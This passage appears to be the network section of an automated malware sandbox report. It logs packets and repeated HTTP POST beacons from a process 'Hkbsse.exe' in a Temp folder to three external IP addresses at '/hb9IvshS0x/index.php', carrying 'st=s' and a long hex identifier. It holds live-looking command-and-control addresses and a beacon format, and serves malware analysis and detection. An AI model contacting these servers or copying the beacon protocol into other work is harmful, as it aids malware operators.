Aug 27, 2024 14:22:52.592278957 CEST	52675	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:52.592371941 CEST	52676	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.595107079 CEST	52677	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.601249933 CEST	80	52677	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:52.601381063 CEST	52677	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.601571083 CEST	52677	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:52.606343031 CEST	80	52677	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:52.706456900 CEST	52678	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:52.706608057 CEST	52679	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:52.711569071 CEST	80	52678	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:52.711611986 CEST	80	52679	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:52.711658955 CEST	52678	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:52.711674929 CEST	52679	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:52.712029934 CEST	52678	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:52.712169886 CEST	52679	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:52.716881037 CEST	80	52678	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:52.717020035 CEST	80	52679	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:53.284235954 CEST	80	52677	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:53.284285069 CEST	52677	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:53.392803907 CEST	52677	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:53.393290043 CEST	52680	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:53.398093939 CEST	80	52677	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:53.398128986 CEST	80	52680	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:53.398138046 CEST	52677	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:53.398184061 CEST	52680	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:53.398308992 CEST	52680	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:53.403247118 CEST	80	52680	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.082253933 CEST	80	52680	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.082593918 CEST	52680	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.087718010 CEST	52680	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.087821960 CEST	52681	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.092916965 CEST	80	52681	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.093038082 CEST	52681	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.093199015 CEST	80	52680	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.093449116 CEST	52680	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.093449116 CEST	52681	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.098733902 CEST	80	52681	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.600406885 CEST	80	52679	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:54.600814104 CEST	80	52679	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:54.603998899 CEST	52679	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:54.603998899 CEST	52679	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:54.607789993 CEST	52682	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:54.608829975 CEST	80	52679	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:54.612668991 CEST	80	52682	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:54.616396904 CEST	52682	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:54.616396904 CEST	52682	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:54.621304989 CEST	80	52682	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:54.776191950 CEST	80	52681	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.776247025 CEST	52681	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.891902924 CEST	52681	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.892272949 CEST	52683	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.897200108 CEST	80	52683	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.897212982 CEST	80	52681	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:54.897259951 CEST	52683	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.897355080 CEST	52681	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.897409916 CEST	52683	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:54.902180910 CEST	80	52683	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:55.579077005 CEST	80	52683	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:55.579138994 CEST	52683	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:55.582293034 CEST	52683	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:55.582685947 CEST	52684	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:55.587454081 CEST	80	52684	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:55.587513924 CEST	52684	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:55.587599039 CEST	80	52683	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:55.587625027 CEST	52684	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:55.587641954 CEST	52683	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:55.592674971 CEST	80	52684	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.228902102 CEST	80	52682	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:56.228996038 CEST	52682	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.229178905 CEST	52682	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.234036922 CEST	80	52682	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:56.265989065 CEST	80	52684	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.269797087 CEST	52684	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.444853067 CEST	52685	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.450978994 CEST	80	52685	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:56.453799009 CEST	52685	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.456764936 CEST	52685	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.461663961 CEST	80	52685	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:56.547775030 CEST	52684	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.549695969 CEST	52686	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.553045034 CEST	80	52684	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.554636002 CEST	80	52686	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.555762053 CEST	52686	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.555784941 CEST	52684	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.555969954 CEST	52686	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.560779095 CEST	80	52686	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.592202902 CEST	52678	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:56.592250109 CEST	52686	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.592250109 CEST	52685	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.597621918 CEST	52687	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.598045111 CEST	52688	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.600716114 CEST	52689	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:56.602642059 CEST	80	52687	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:56.602835894 CEST	80	52688	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.603782892 CEST	52688	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.603784084 CEST	52687	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.603929996 CEST	52687	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:56.604020119 CEST	52688	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:56.605642080 CEST	80	52689	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:56.608721018 CEST	80	52687	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:56.609412909 CEST	80	52688	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:56.609561920 CEST	52689	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:56.612787962 CEST	52689	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:56.617599010 CEST	80	52689	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:57.292740107 CEST	80	52688	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:57.292820930 CEST	52688	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:57.406970978 CEST	52688	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:57.407504082 CEST	52691	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:57.412307024 CEST	80	52688	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:57.412354946 CEST	52688	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:57.412657976 CEST	80	52691	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:57.412709951 CEST	52691	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:57.412899017 CEST	52691	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:57.417721987 CEST	80	52691	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:58.115164995 CEST	80	52691	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:58.115278006 CEST	52691	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:58.117523909 CEST	52691	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:58.117877007 CEST	52692	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:58.122941971 CEST	80	52692	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:58.123188972 CEST	52692	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:58.123245001 CEST	80	52691	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:58.123373032 CEST	52691	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:58.123433113 CEST	52692	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:58.128838062 CEST	80	52692	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:58.225177050 CEST	80	52687	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:58.225421906 CEST	52687	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:58.229682922 CEST	52687	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:58.234642029 CEST	80	52687	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:58.344902039 CEST	52693	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:58.349853039 CEST	80	52693	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:58.350034952 CEST	52693	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:58.350297928 CEST	52693	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:58.355247974 CEST	80	52693	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:58.805999994 CEST	80	52692	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:58.806193113 CEST	52692	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:59.940525055 CEST	80	52693	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:59.940610886 CEST	52693	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:59.940655947 CEST	52693	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:59.945652962 CEST	80	52693	185.209.162.226	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 27, 2024 14:19:14.223757029 CEST	53	57758	1.1.1.1	192.168.2.6

HTTP Request Dependency Graph

185.209.162.226

89.23.103.42

185.208.158.116

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	52211	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:23.440553904 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	52210	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:23.440640926 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	52212	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:23.440836906 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:24.148998022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:24.277441025 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:24.523554087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	52213	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:24.645291090 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:25.343249083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:25.344122887 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:25.583080053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	52214	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:25.079119921 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	52215	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:25.691469908 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:26.385049105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:26.385790110 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:26.625111103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	52216	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:26.738140106 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:27.423376083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	52217	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:26.816659927 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	52218	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:27.430649996 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	52219	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:27.431710005 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	52220	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:27.431849003 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:28.130945921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	52221	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:28.238739967 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:28.916901112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:28.917747974 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
